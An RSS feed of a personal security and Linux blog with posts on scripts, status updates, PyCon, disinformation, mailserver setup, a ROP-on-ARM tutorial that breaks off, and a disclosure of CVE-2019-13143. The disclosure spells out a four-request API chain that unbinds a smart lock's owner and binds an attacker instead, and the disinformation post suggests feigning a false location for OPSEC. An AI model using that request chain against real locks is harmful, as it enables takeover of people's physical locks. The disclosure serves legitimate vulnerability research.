https://icyphox.sh/blog/irc-for-dmsSun, 03 Nov 2019 00:00:00 +0000https://icyphox.sh/blog/irc-for-dms
The intelligence conundrumI watched the latest S.W.A.T. episode a couple of days ago, and it highlighted some interesting issues that intelligence organizations face when working with law enforcement. Side note: it’s a pretty good show if you like police procedurals.

The problem

Consider the following scenario:

  • There’s a local drug lord who’s been recruited to provide intel, by a certain 3-letter organization.
  • Local PD busts his operation and proceed to arrest him.
  • 3-letter org steps in, wants him released.

So here’s the thing, his presence is a threat to public but at the same time, he can be a valuable long term asset—giving info on drug inflow, exchanges and perhaps even actionable intel on bigger fish who exist on top of the ladder. But he also seeks security. The 3-letter org must provide him with protection, in case he’s blown. And like in our case, they’d have to step in if he gets arrested.

Herein lies the problem. How far should an intelligence organization go to protect an asset? Who matters more, the people they’ve sworn to protect, or the asset? Because afterall, in the bigger picture, local PD and intel orgs are on the same side.

Thus, the question arises—how can we measure the “usefulness” of an asset to better quantify the tradeoff that is to be made? Is the intel gained worth the loss of public safety? This question remains largely unanswered, and is quite the predicament should you find yourself in it.

This was a fairly short post, but an interesting problem to ponder nonetheless.

]]>
https://icyphox.sh/blog/intel-conundrumMon, 28 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/intel-conundrum
Hacky scriptsAs a CS student, I see a lot of people around me doing courses online to learn to code. Don’t get me wrong—it probably works for some. Everyone learns differently. But that’s only going to get you so far. Great you know the syntax, you can solve some competitive programming problems, but that’s not quite enough, is it? The actual learning comes from applying it in solving actual problems—not made up ones. (inb4 some seething CP bro comes at me)

Now, what’s an actual problem? Some might define it as real world problems that people out there face, and solving it probably requires building a product. This is what you see in hackathons, generally.

If you ask me, however, I like to define it as problems that you yourself face. This could be anything. Heck, it might not even be a “problem”. It could just be an itch that you want to scratch. And this is where hacky scripts come in. Unclear? Let me illustrate with a few examples.

Now playing status in my bar

If you weren’t aware already—I rice my desktop. A lot. And a part of this cohesive experience I try to create involves a status bar up at the top of my screen, showing the time, date, volume and battery statuses etc.

So here’s the “problem”. I wanted to have my currently playing song (Spotify), show up on my bar. How did I approach this? A few ideas popped up in my head:

  • Send playerctl’s STDOUT into my bar
  • Write a Python script to query Spotify’s API
  • Write a Python/shell script to query Last.fm’s API

The first approach bombed instantly. playerctl didn’t recognize my Spotify client and whined about some dbus issues to top it off. I spent a while in that rabbit hole but eventually gave up.

My next avenue was the Spotify Web API. One look at the docs and I realize that I’ll have to make more than one request to fetch the artist and track details. Nope, I need this to work fast.

Last resort—Last.fm’s API. Spolier alert, this worked. Also, arguably the best choice, since it shows the track status regardless of where the music is being played. Here’s the script in its entirety:

#!/usr/bin/env bash
# now playing
# requires the last.fm API key

source ~/.lastfm    # `export API_KEY="<key>"`
fg="$(xres color15)"
light="$(xres color8)"

USER="icyphox"
URL="http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"
URL+="&user=$USER&api_key=$API_KEY&format=json&limit=1&nowplaying=true"
NOTPLAYING=" "    # I like to have it show nothing
RES=$(curl -s $URL)
NOWPLAYING=$(jq '.recenttracks.track[0]."@attr".nowplaying' <<< "$RES" | tr -d '"')


if [[ "$NOWPLAYING" = "true" ]]
then
    TRACK=$(jq '.recenttracks.track[0].name' <<< "$RES" | tr -d '"')
    ARTIST=$(jq '.recenttracks.track[0].artist."#text"' <<< "$RES" | tr -d '"')
    echo -ne "%{F$light}$TRACK %{F$fg}by $ARTIST"
else
    echo -ne "$NOTPLAYING"
fi

The source command is used to fetch the API key which I store at ~/.lastfm. The fg and light variables can be ignored, they’re only for coloring output on my bar. The rest is fairly trivial and just involves JSON parsing with jq. That’s it! It’s so small, but I learnt a ton. For those curious, here’s what it looks like running:

now playing status polybar

Update latest post on the index page

This pertains to this very blog that you’re reading. I wanted a quick way to update the “latest post” section in the home page and the blog listing, with a link to the latest post. This would require editing the Markdown source of both pages.

This was a very interesting challenge to me, primarily because it requires in-place editing of the file, not just appending. Sure, I could’ve come up with some sed one-liner, but that didn’t seem very fun. Also I hate regexes. Did a lot of research (read: Googling) on in-place editing of files in Python, sorting lists of files by modification time etc. and this is what I ended up on, ultimately:

#!/usr/bin/env python3

from markdown2 import markdown_path
import os
import fileinput
import sys

# change our cwd
os.chdir("bin")

blog = "../pages/blog/"

# get the most recently created file
def getrecent(path):
    files = [path + f for f in os.listdir(blog) if f not in ["_index.md", "feed.xml"]]
    files.sort(key=os.path.getmtime, reverse=True)
    return files[0]

# adding an entry to the markdown table
def update_index(s):
    path = "../pages/_index.md"
    with open(path, "r") as f:
        md = f.readlines()
    ruler = md.index("|  --  | --: |\n")
    md[ruler + 1] = s + "\n"

    with open(path, "w") as f:
        f.writelines(md)

# editing the md source in-place
def update_blog(s):
    path = "../pages/blog/_index.md"
    s = s + "\n"
    for l in fileinput.FileInput(path, inplace=1):
        if "--:" in l:
            l = l.replace(l, l + s)
        print(l, end=""),


# fetch title and date
meta = markdown_path(getrecent(blog), extras=["metadata"]).metadata
fname = os.path.basename(os.path.splitext(getrecent(blog))[0])
url = "/blog/" + fname
line = f"| [{meta['title']}]({url}) | `{meta['date']}` |"

update_index(line)
update_blog(line)

I’m going to skip explaining this one out, but in essence, it’s one massive hack. And in the end, that’s my point exactly. It’s very hacky, but the sheer amount I learnt by writing this ~50 line script can’t be taught anywhere.

This was partially how vite was born. It was originally intended to be a script to build my site, but grew into a full-blown Python package. I could’ve just used an off-the-shelf static site generator given that there are so many of them, but I chose to write one myself.

And that just about sums up what I wanted to say. The best and most fun way to learn to code—write hacky scripts. You heard it here.

]]>
https://icyphox.sh/blog/hacky-scriptsThu, 24 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/hacky-scripts
Status updateI’ve decided to drop the “Weekly” part of the status update posts, since they were never weekly and—let’s be honest---they aren’t going to be. These posts are, henceforth, just “Status updates”. The date range can be inferred from the post date.

That said, here’s what I’ve been up to!

Void Linux

Yes, I decided to ditch Alpine in favor of Void. Alpine was great, really. The very comfy apk, ultra mnml system… but having to maintain a chroot for my glibc needs was getting way too painful. And the package updates are so slow! Heck, they’re still on kernel 4.xx on their supposed “bleeding” edge repo.

So yes, Void Linux it is. Still a very clean system. I’m loving it. I also undervolted my system using undervolt (-95 mV). Can’t say for sure if there’s a noticeable difference in battery life though. I’ll see if I can run some tests.

This should be the end of my distro hopping. Hopefully.

PyCon

Yeah yeah, enough already. Read my previous post.

This website

I’ve moved out of GitHub Pages over to Netlify. This isn’t my first time using Netlify, though. I used to host my old blog which ran Hugo, there. I was tired of doing this terrible hack to maintain a single repo for both my source (master) and deploy (gh-pages). In essence, here’s what I did:

#!/usr/bin/env bash

git push origin master
# push contents of `build/` to the `gh-pages` branch
git subtree push --prefix build origin gh-pages

I can now simply push to master, and Netlify generates a build for me by installing vite, and running vite build. Very pleasant.

mnmlwm’s status

mnmlwm, for those unaware, is my pet project which aims to be a simple window manager written in Nim. I’d taken a break from it for a while because Xlib is such a pain to work with (or I’m just dense). Anyway, I’m planning on getting back to it, with some fresh inspiration from Dylan Araps’ sowm.

Other

I’ve been reading a lot of manga lately. Finished Kekkon Yubiwa Monogatari (till the latest chapter) and Another, and I’ve just started Kakegurui. I’ll reserve my opinions for when I update the reading log.

That’s about it, and I’ll see you—definitely not next week.

]]>
https://icyphox.sh/blog/2019-10-17Wed, 16 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/2019-10-17
PyCon India 2019 wrap-upI’m writing this article as I sit in class, back on the grind. Last weekend—Oct 12th and 13th---was PyCon India 2019, in Chennai, India. It was my first PyCon, and my first ever talk at a major conference! This is an account of the all the cool stuff I saw, people I met and the talks I enjoyed. Forgive the lack of pictures—I prefer living the moment through my eyes.

Talks

So much ML! Not that it’s a bad thing, but definitely interesting to note. From what I counted, there were about 17 talks tagged under “Data Science, Machine Learning and AI”. I’d have liked to see more talks discussing security and privacy, but hey, the organizers can only pick from what’s submitted. ;)

With that point out of the way, here are some of the talks I really liked:

  • Python Packaging–where we are and where we’re headed by Pradyun
  • Micropython: Building a Physical Inventory Search Engine by Vinay
  • Ragabot–Music Encoded by Vikrant
  • Let’s Hunt a Memory Leak by Sanket
  • oh and of course, David Beazley’s closing keynote

My talk (!!!)

My good buddy Raghav and I spoke about our smart lock security research. Agreed, it might have been less “hardware” and more of a bug on the server-side, but that’s the thing about IoT right? It’s so multi-faceted, and is an amalgamation of so many different hardware and software stacks. But, anyway…

I was reassured by folks after the talk that the silence during Q/A was the “good” kind of silence. Was it really? I’ll never know.

Some nice people I met

  • Abhirath—A 200 IQ lad. Talked to me about everything from computational biology to the physical implementation of quantum computers.
  • Abin—He recognized me from my r/unixporn posts, which was pretty awesome.
  • Abhishek
  • Pradyun and Vikrant (linked earlier)

And a lot of other people doing really great stuff, whose names I’m forgetting.

Pictures!

It’s not much, and I can’t be bothered to format them like a collage or whatever, so I’ll just dump them here—as is.

nice badge awkward smile! me talking s443 @ pycon

C’est tout

Overall, a great time and a weekend well spent. It was very different from your typical security conference—a lot more chill, if you will. The organizers did a fantastic job and the entire event was put together really well. I don’t have much else to say, but I know for sure that I’ll be there next time.

That was PyCon India, 2019.

]]>
https://icyphox.sh/blog/pycon-wrap-upTue, 15 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/pycon-wrap-up
Thoughts on digital minimalismAh yes, yet another article on the internet on this beaten to death subject. But this is inherently different, since it’s my opinion on the matter, and my technique(s) to achieve “digital minimalism”.

According to me, minimalism can be achieved on two primary fronts -- the phone & the computer. Let’s start with the phone. The daily carry. The device that’s on our person from when we get out of bed, till we get back in bed.

The phone

I’ve read about a lot of methods people employ to curb their phone usage. Some have tried grouping “distracting” apps into a separate folder, and this supposedly helps reduce their usage. Now, I fail to see how this would work, but YMMV. Another technique I see often is using a time governance app—like OnePlus’ Zen Mode---to enforce how much time you spend using specific apps, or the phone itself. I’ve tried this for myself, but I constantly found myself counting down the minutes after which the phone would become usable again. Not helpful.

My solution to this is a lot more brutal. I straight up uninstalled the apps that I found myself using too often. There’s a simple principle behind it—if the app has a desktop alternative, like Twitter, Reddit, etc. use that instead. Here’s a list of apps that got nuked from my phone:

  • Twitter
  • Instagram (an exception, no desktop client)
  • Relay for Reddit
  • YouTube (disabled, ships with stock OOS)

The only non-productive app that I’ve let remain is Clover, a 4chan client. I didn’t find myself using it as much earlier, but we’ll see how that holds up. I’ve also allowed my personal messaging apps to remain, since removing those would be inconveniencing others.

I must admit, I often find myself reaching for my phone out of habit just to check Twitter, only to find that its gone. I also subconsciously tap the place where its icon used to exist (now replaced with my mail client) on my launcher. The only “fun” thing left on my phone to do is read or listen to music. Which is okay, in my opinion.

The computer

I didn’t do anything too nutty here, and most of the minimalism is mostly aesthetic. I like UIs that get out of the way.

My setup right now is just a simple bar at the top showing the time, date, current volume and battery %, along with my workspace indicators. No fancy colors, no flashy buttons and sliders. And that’s it. I don’t try to force myself to not use stuff—after all, I’ve reduced it elsewhere. :)

Now the question arises: Is this just a phase, or will I stick to it? What’s going to stop me from heading over to the Play Store and installing those apps back? Well, I never said this was going to be easy. There’s definitely some will power needed to pull this off. I guess time will tell.

]]>
https://icyphox.sh/blog/digital-minimalismSat, 05 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/digital-minimalism
Weekly status update, 09/17–09/27It’s a lazy Friday afternoon here; yet another off day this week thanks to my uni’s fest. My last “weekly” update was 10 days ago, and a lot has happened since then. Let’s get right into it!

My switch to Alpine

Previously, I ran Debian with Buster/Sid repos, and ever since this happened

$ dpkg --list | wc -l
3817

# or something in that ballpark

I’ve been wanting to reduce my system’s package count.

Thus, I began my search for a smaller, simpler and lighter distro with a fairly sane package manager. I did come across Dylan Araps’ KISS Linux project, but it seemed a little too hands-on for me (and still relatively new). I finally settled on Alpine Linux. According to their website:

Alpine Linux is a security-oriented, lightweight Linux distribution based on musl libc and busybox.

The installation was a breeze, and I was quite surprised to see WiFi working OOTB. In the past week of my using this distro, the only major hassle I faced was getting my Minecraft launcher to run. The JRE isn’t fully ported to musl yet.1 The solution to that is fairly trivial and I plan to write about it soon. (hint: it involves chroots)

rice

Packaging for Alpine

On a related note, I’ve been busy packaging some of the stuff I use for Alpine -- you can see my personal aports repository if you’re interested. I’m currently working on packaging Nim too, so keep an eye out for that in the coming week.

Talk selection at PyCon India!

Yes! My buddy Raghav (@_vologue) and I are going to be speaking at PyCon India about our recent smart lock security research. The conference is happening in Chennai, much to our convenience. If you’re attending too, hit me up on Twitter and we can hang!

Other

That essentially sums up the technical stuff that I did. My Russian is going strong, my reading however, hasn’t. I have yet to finish those books! This week, for sure.

Musically, I’ve been experimenting. I tried a bit of hip-hop and chilltrap, and I think I like it? I still find myself coming back to metalcore/deathcore. Here’s a list of artists I discovered (and liked) recently:

That’s it for now, I’ll see you next week!

]]>
https://icyphox.sh/blog/2019-09-27Fri, 27 Sep 2019 00:00:00 +0000https://icyphox.sh/blog/2019-09-27
Weekly status update, 09/08–09/17This is something new I’m trying out, in an effort to write more frequently and to serve as a log of how I’m using my time. In theory, I will write this post every week. I’ll need someone to hold me accountable if I don’t. I have yet to decide on a format for this, but it will probably include a quick summary of the work I did, things I read, IRL stuff, etc.

With the meta stuff out of the way, here’s what went down last week!

My discovery of the XXIIVV webring

Did you notice the new fidget-spinner-like logo at the bottom? Click it! It’s a link to the XXIIVV webring. I really like the idea of webrings. It creates a small community of sites and enables sharing of traffic among these sites. The XXIIVV webring consists mostly of artists, designers and developers and gosh, some of those sites are beautiful. Mine pales in comparison.

The webring also has a twtxt echo chamber aptly called The Hallway. twtxt is a fantastic project and its complexity-to-usefulness ratio greatly impresses me. You can find my personal twtxt feed at /twtxt.txt (root of this site).

Which brings me to the next thing I did this/last week.

twsh: a twtxt client written in Bash

I’m not a fan of the official Python client, because you know, Python is bloat. As an advocate of mnmlsm, I can’t use it in good conscience. Thus, began my authorship of a truly mnml client in pure Bash. You can find it here. It’s not entirely useable as of yet, but it’s definitely getting there, with the help of @nerdypepper.

Other

I have been listening to my usual podcasts: Crime Junkie, True Crime Garage, Darknet Diaries & Off the Pill. To add to this list, I’ve begun binging Vice’s CYBER. It’s pretty good—each episode is only about 30 mins and it hits the sweet spot, delvering both interesting security content and news.

My reading needs a ton of catching up. Hopefully I’ll get around to finishing up “The Unending Game” this week. And then go back to “Terrorism and Counterintelligence”.

I’ve begun learning Russian! I’m really liking it so far, and it’s been surprisingly easy to pick up. Learning the Cyrillic script will require some relearning, especially with letters like в, н, р, с, etc. that look like English but sound entirely different. I think I’m pretty serious about learning this language—I’ve added the Russian keyboard to my Google Keyboard to aid in my familiarization of the alphabet. I’ve added the RU layout to my keyboard map too:

setxkbmap -option 'grp:alt_shift_toggle' -layout us,ru

With that ends my weekly update, and I’ll see you next week!

]]>
https://icyphox.sh/blog/2019-09-17Tue, 17 Sep 2019 00:00:00 +0000https://icyphox.sh/blog/2019-09-17
Disinformation demystifiedAs with the disambiguation of any word, let’s start with its etymology and definiton. According to Wikipedia, disinformation has been borrowed from the Russian word — dezinformatisya (дезинформа́ция), derived from the title of a KGB black propaganda department.

Disinformation is false information spread deliberately to deceive.

To fully understand disinformation, especially in the modern age, we need to understand the key factors of any successful disinformation operation:

  • creating disinformation (what)
  • the motivation behind the op, or its end goal (why)
  • the medium used to disperse the falsified information (how)
  • the actor (who)

At the end, we’ll also look at how you can use disinformation techniques to maintain OPSEC.

In order to break monotony, I will also be using the terms “information operation”, or the shortened forms—“info op” & “disinfo”.

Creating disinformation

Crafting or creating disinformation is by no means a trivial task. Often, the quality of any disinformation sample is a huge indicator of the level of sophistication of the actor involved, i.e. is it a 12 year old troll or a nation state?

Well crafted disinformation always has one primary characteristic — “plausibility”. The disinfo must sound reasonable. It must induce the notion it’s likely true. To achieve this, the target — be it an individual, a specific demographic or an entire nation — must be well researched. A deep understanding of the target’s culture, history, geography and psychology is required. It also needs circumstantial and situational awareness, of the target.

There are many forms of disinformation. A few common ones are staged videos / photographs, recontextualized videos / photographs, blog posts, news articles & most recently — deepfakes.

Here’s a tweet from the grugq, showing a case of recontextualized imagery:

Motivations behind an information operation

I like to broadly categorize any info op as either proactive or reactive. Proactively, disinformation is spread with the desire to influence the target either before or during the occurence of an event. This is especially observed during elections.1 In offensive information operations, the target’s psychological state can be affected by spreading fear, uncertainty & doubt, or FUD for short.

Reactive disinformation is when the actor, usually a nation state in this case, screws up and wants to cover their tracks. A fitting example of this is the case of Malaysian Airlines Flight 17 (MH17), which was shot down while flying over eastern Ukraine. This tragic incident has been attributed to Russian-backed separatists.2 Russian media is known to have desseminated a number of alternative & some even conspiratorial theories3, in response. The number grew as the JIT’s (Dutch-lead Joint Investigation Team) investigations pointed towards the separatists. The idea was to muddle the information space with these theories, and as a result, potentially correct information takes a credibility hit.

Another motive for an info op is to control the narrative. This is often seen in use in totalitarian regimes; when the government decides what the media portrays to the masses. The ongoing Hong Kong protests is a good example.4 According to NPR:

Official state media pin the blame for protests on the “black hand” of foreign interference, namely from the United States, and what they have called criminal Hong Kong thugs. A popular conspiracy theory posits the CIA incited and funded the Hong Kong protesters, who are demanding an end to an extradition bill with China and the ability to elect their own leader. Fueling this theory, China Daily, a state newspaper geared toward a younger, more cosmopolitan audience, this week linked to a video purportedly showing Hong Kong protesters using American-made grenade launchers to combat police. …

Media used to disperse disinfo

As seen in the above example of totalitarian governments, national TV and newspaper agencies play a key role in influence ops en masse. It guarantees outreach due to the channel/paper’s popularity.

Twitter is another, obvious example. Due to the ease of creating accounts and the ability to generate activity programmatically via the API, Twitter bots are the go-to choice today for info ops. Essentially, an actor attempts to create “discussions” amongst “users” (read: bots), to push their narrative(s). Twitter also provides analytics for every tweet, enabling actors to get realtime insights into what sticks and what doesn’t. The use of Twitter was seen during the previously discussed MH17 case, where Russia employed its troll factory — the Internet Research Agency (IRA) to create discussions about alternative theories.

In India, disinformation is often spread via YouTube, WhatsApp and Facebook. Political parties actively invest in creating group chats to spread political messages and memes. These parties have volunteers whose sole job is to sit and forward messages. Apart from political propaganda, WhatsApp finds itself as a medium of fake news. In most cases, this is disinformation without a motive, or the motive is hard to determine simply because the source is impossible to trace, lost in forwards.5 This is a difficult problem to combat, especially given the nature of the target audience.

The actors behind disinfo campaigns

I doubt this requires further elaboration, but in short:

  • nation states and their intelligence agencies
  • governments, political parties
  • other non/quasi-governmental groups
  • trolls

This essentially sums up the what, why, how and who of disinformation.

Personal OPSEC

This is a fun one. Now, it’s common knowledge that STFU is the best policy. But sometimes, this might not be possible, because afterall inactivity leads to suspicion, and suspicion leads to scrutiny. Which might lead to your OPSEC being compromised. So if you really have to, you can feign activity using disinformation. For example, pick a place, and throw in subtle details pertaining to the weather, local events or regional politics of that place into your disinfo. Assuming this is Twitter, you can tweet stuff like:

  • “Ugh, when will this hot streak end?!”
  • “Traffic wonky because of the Mardi Gras parade.”
  • “Woah, XYZ place is nice! Especially the fountains by ABC street.”

Of course, if you’re a nobody on Twitter (like me), this is a non-issue for you.

And please, don’t do this:

mcafee opsecfail

Conclusion

The ability to influence someone’s decisions/thought process in just one tweet is scary. There is no simple way to combat disinformation. Social media is hard to control. Just like anything else in cyber, this too is an endless battle between social media corps and motivated actors.

A huge shoutout to Bellingcat for their extensive research in this field, and for helping folks see the truth in a post-truth world.


  1. This episode of CYBER talks about election influence ops (features the grugq!). 

  2. The Bellingcat Podcast’s season one covers the MH17 investigation in detail. 

  3. Wikipedia section on MH17 conspiracy theories 

  4. Chinese newspaper spreading disinfo 

  5. Use an adblocker before clicking this

]]>
https://icyphox.sh/blog/disinfoTue, 10 Sep 2019 00:00:00 +0000https://icyphox.sh/blog/disinfo
Setting up my personal mailserverA mailserver was a long time coming. I’d made an attempt at setting one up around ~4 years ago (ish), and IIRC, I quit when it came to DNS. And I almost did this time too.1

For this attempt, I wanted a simpler approach. I recall how terribly confusing Dovecot & Postfix were to configure and hence I decided to look for a containerized solution, that most importantly, runs on my cheap $5 Digital Ocean VPS — 1 vCPU and 1 GB memory. Of which only around 500 MB is actually available. So yeah, pretty tight.

What’s available

Turns out, there are quite a few of these OOTB, ready to deply solutions. These are the ones I came across:

  • poste.io: Based on an “open core” model. The base install is open source and free (as in beer), but you’ll have to pay for the extra stuff.

  • mailu.io: Free software. Draws inspiration from poste.io, but ships with a web UI that I didn’t need.

  • mailcow.email: These fancy domains are getting ridiculous. But more importantly they need 2 GiB of RAM plus swap?! Nope.

  • Mail-in-a-Box: Unlike the ones above, not a Docker-based solution but definitely worth a mention. It however, needs a fresh box to work with. A box with absolutely nothing else on it. I can’t afford to do that.

  • docker-mailserver: The winner.

So… docker-mailserver

The first thing that caught my eye in the README:

Recommended:

  • 1 CPU
  • 1GB RAM

Minimum:

  • 1 CPU
  • 512MB RAM

Fantastic, I can somehow squeeze this into my existing VPS. Setup was fairly simple & the docs are pretty good. It employs a single .env file for configuration, which is great. However, I did run into a couple of hiccups here and there.

One especially nasty one was docker / docker-compose running out of memory.

Error response from daemon: cannot stop container: 2377e5c0b456: Cannot kill container 2377e5c0b456226ecaa66a5ac18071fc5885b8a9912feeefb07593638b9a40d1: OCI runtime state failed: runc did not terminate sucessfully: fatal error: runtime: out of memory

But it eventually worked after a couple of attempts.

The next thing I struggled with — DNS. Specifically, the with the step where the DKIM keys are generated2. The output under
config/opendkim/keys/domain.tld/mail.txt
isn’t exactly CloudFlare friendly; they can’t be directly copy-pasted into a TXT record.

This is what it looks like.

mail._domainkey IN  TXT ( "v=DKIM1; h=sha256; k=rsa; "
      "p=<key>"
      "<more key>" )  ;  -- -- DKIM key mail for icyphox.sh

But while configuring the record, you set “Type” to TXT, “Name” to mail._domainkey, and the “Value” to what’s inside the parenthesis ( ), removing the quotes "". Also remove the part that appears to be a comment ; -- -- ....

To simplify debugging DNS issues later, it’s probably a good idea to point to your mailserver using a subdomain like mail.domain.tld using an A record. You’ll then have to set an MX record with the “Name” as @ (or whatever your DNS provider uses to denote the root domain) and the “Value” to mail.domain.tld. And finally, the PTR (pointer record, I think), which is the reverse of your A record — “Name” as the server IP and “Value” as mail.domain.tld. I learnt this part the hard way, when my outgoing email kept getting rejected by Tutanota’s servers.

Yet another hurdle — SSL/TLS certificates. This isn’t very properly documented, unless you read through the wiki and look at an example. In short, install certbot, have port 80 free, and run

$ certbot certonly --standalone -d mail.domain.tld

Once that’s done, edit the docker-compose.yml file to mount /etc/letsencrypt in the container, something like so:

...

volumes:
    - maildata:/var/mail
    - mailstate:/var/mail-state
    - ./config/:/tmp/docker-mailserver/
    - /etc/letsencrypt:/etc/letsencrypt

...

With this done, you shouldn’t have mail clients complaining about wonky certs for which you’ll have to add an exception manually.

Why would you…?

There are a few good reasons for this:

Privacy

No really, this is the best choice for truly private email. Not ProtonMail, not Tutanota. Sure, they claim so and I don’t dispute it. Quoting Drew Devault3,

Truly secure systems do not require you to trust the service provider.

But you have to trust ProtonMail. They run open source software, but how can you really be sure that it isn’t a backdoored version of it?

When you host your own mailserver, you truly own your email without having to rely on any third-party. This isn’t an attempt to spread FUD. In the end, it all depends on your threat model™.

Decentralization

Email today is basically run by Google. Gmail has over 1.2 billion active users. That’s obscene. Email was designed to be decentralized but big corps swooped in and made it a product. They now control your data, and it isn’t unknown that Google reads your mail. This again loops back to my previous point, privacy. Decentralization guarantees privacy. When you control your mail, you subsequently control who reads it.

Personalization

Can’t ignore this one. It’s cool to have a custom email address to flex.

x@icyphox.sh vs gabe.newell4321@gmail.com

Pfft, this is no competition.


  1. My tweet of frustration. 

  2. Link to step in the docs. 

  3. From his article on why he doesn’t trust Signal. 

]]>
https://icyphox.sh/blog/mailserverThu, 15 Aug 2019 00:00:00 +0000https://icyphox.sh/blog/mailserver
Picking the FB50 smart lock (CVE-2019-13143)(originally posted at SecureLayer7’s Blog, with my edits)

The lock

The lock in question is the FB50 smart lock, manufactured by Shenzhen Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands across many ecommerce sites, and has over, an estimated, 15k+ users.

The lock pairs to a phone via Bluetooth, and requires the OKLOK app from the Play/App Store to function. The app requires the user to create an account before further functionality is available. It also facilitates configuring the fingerprint, and unlocking from a range via Bluetooth.

We had two primary attack surfaces we decided to tackle—Bluetooth (BLE) and the Android app.

Via Bluetooth Low Energy (BLE)

Android phones have the ability to capture Bluetooth (HCI) traffic which can be enabled under Developer Options under Settings. We made around 4 “unlocks” from the Android phone, as seen in the screenshot.

wireshark packets

This is the value sent in the Write request:

wireshark write req

We attempted replaying these requests using gattool and gattacker, but that didn’t pan out, since the value being written was encrypted.1

Via the Android app

Reversing the app using jd-gui, apktool and dex2jar didn’t get us too far since most of it was obfuscated. Why bother when there exists an easier approach—BurpSuite.

We captured and played around with a bunch of requests and responses, and finally arrived at a working exploit chain.

The exploit

The entire exploit is a 4 step process consisting of authenticated HTTP requests:

  1. Using the lock’s MAC (obtained via a simple Bluetooth scan in the vicinity), get the barcode and lock ID
  2. Using the barcode, fetch the user ID
  3. Using the lock ID and user ID, unbind the user from the lock
  4. Provide a new name, attacker’s user ID and the MAC to bind the attacker to the lock

This is what it looks like, in essence (personal info redacted).

Request 1

POST /oklock/lock/queryDevice
{"mac":"XX:XX:XX:XX:XX:XX"}

Response:

{
   "result":{
      "alarm":0,
      "barcode":"<BARCODE>",
      "chipType":"1",
      "createAt":"2019-05-14 09:32:23.0",
      "deviceId":"",
      "electricity":"95",
      "firmwareVersion":"2.3",
      "gsmVersion":"",
      "id":<LOCK ID>,
      "isLock":0,
      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
      "lockPwd":"000000",
      "mac":"XX:XX:XX:XX:XX:XX",
      "name":"lock",
      "radioName":"BlueFPL",
      "type":0
   },
   "status":"2000"
}

Request 2

POST /oklock/lock/getDeviceInfo

{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}

Response:

   "result":{
      "account":"email@some.website",
      "alarm":0,
      "barcode":"<BARCODE>",
      "chipType":"1",
      "createAt":"2019-05-14 09:32:23.0",
      "deviceId":"",
      "electricity":"95",
      "firmwareVersion":"2.3",
      "gsmVersion":"",
      "id":<LOCK ID>,
      "isLock":0,
      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
      "lockPwd":"000000",
      "mac":"XX:XX:XX:XX:XX:XX",
      "name":"lock",
      "radioName":"BlueFPL",
      "type":0,
      "userId":<USER ID>
   }

Request 3

POST /oklock/lock/unbind

{"lockId":"<LOCK ID>","userId":<USER ID>}

Request 4

POST /oklock/lock/bind

{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}

That’s it! (& the scary stuff)

You should have the lock transferred to your account. The severity of this issue lies in the fact that the original owner completely loses access to their lock. They can’t even “rebind” to get it back, since the current owner (the attacker) needs to authorize that.

To add to that, roughly 15,000 user accounts’ info are exposed via IDOR. Ilja, a cool dude I met on Telegram, noticed locks named “carlock”, “garage”, “MainDoor”, etc.2 This is terrifying.

shudders

Proof of Concept

PoC Video

Exploit code

Disclosure timeline

  • 26th June, 2019: Issue discovered at SecureLayer7, Pune
  • 27th June, 2019: Vendor notified about the issue
  • 2nd July, 2019: CVE-2019-13143 reserved
  • No response from vendor
  • 2nd August 2019: Public disclosure

Lessons learnt

DO NOT. Ever. Buy. A smart lock. You’re better off with the “dumb” ones with keys. With the IoT plague spreading, it brings in a large attack surface to things that were otherwise “unhackable” (try hacking a “dumb” toaster).

The IoT security scene is rife with bugs from over 10 years ago, like executable stack segments3, hardcoded keys, and poor development practices in general.

Our existing threat models and scenarios have to be updated to factor in these new exploitation possibilities. This also broadens the playing field for cyber warfare and mass surveillance campaigns.

Researcher info

This research was done at SecureLayer7, Pune, IN by:


  1. This article discusses a similar smart lock, but they broke the encryption. 

  2. Thanks to Ilja Shaposhnikov (@drakylar). 

  3. PDF 

]]>
https://icyphox.sh/blog/fb50Mon, 05 Aug 2019 00:00:00 +0000https://icyphox.sh/blog/fb50
Return Oriented Programming on ARM (32-bit)Before we start anything, you’re expected to know the basics of ARM assembly to follow along. I highly recommend Azeria’s series on ARM Assembly Basics. Once you’re comfortable with it, proceed with the next bit—environment setup.

Setup

Since we’re working with the ARM architecture, there are two options to go forth with:

  1. Emulate—head over to qemu.org/download and install QEMU. And then download and extract the ARMv6 Debian Stretch image from one of the links here. The scripts found inside should be self-explanatory.
  2. Use actual ARM hardware, like an RPi.

For debugging and disassembling, we’ll be using plain old gdb, but you may use radare2, IDA or anything else, really. All of which can be trivially installed.

And for the sake of simplicity, disable ASLR:

$ echo 0 > /proc/sys/kernel/randomize_va_space

Finally, the binary we’ll be using in this exercise is Billy Ellis’ roplevel2.

Compile it:

$ gcc roplevel2.c -o rop2

With that out of the way, here’s a quick run down of what ROP actually is.

A primer on ROP

ROP or Return Oriented Programming is a modern exploitation technique that’s used to bypass protections like the NX bit (no-execute bit) and code sigining. In essence, no code in the binary is actually modified and the entire exploit is crafted out of pre-existing artifacts within the binary, known as gadgets.

A gadget is essentially a small sequence of code (instructions), ending with a ret, or a return instruction. In our case, since we’re dealing with ARM code, there is no ret instruction but rather a pop {pc} or a bx lr. These gadgets are chained together by jumping (returning) from one onto the other to form what’s called as a ropchain. At the end of a ropchain, there’s generally a call to system(), to acheive code execution.

In practice, the process of executing a ropchain is something like this:

  • confirm the existence of a stack-based buffer overflow
  • identify the offset at which the instruction pointer gets overwritten
  • locate the addresses of the gadgets you wish to use
  • craft your input keeping in mind the stack’s layout, and chain the addresses of your gadgets

LiveOverflow has a beautiful video where he explains ROP using “weird machines”. Check it out, it might be just what you needed for that “aha!” moment :)

Still don’t get it? Don’t fret, we’ll look at actual exploit code in a bit and hopefully that should put things into perspective.

Exploring our binary

Start by running it, and entering any arbitrary string. On entering a fairly large string, say, “A” × 20, we see a segmentation fault occur.

string and segfault

Now, open it up in gdb and look at the functions inside it.

gdb functions

